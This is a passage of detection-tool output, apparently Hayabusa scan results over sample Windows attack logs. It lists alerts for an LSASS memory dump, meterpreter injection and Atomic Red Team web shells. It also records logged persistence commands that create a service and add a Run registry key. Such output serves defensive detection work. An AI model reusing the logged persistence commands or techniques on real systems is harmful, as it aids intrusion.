Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : 
Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
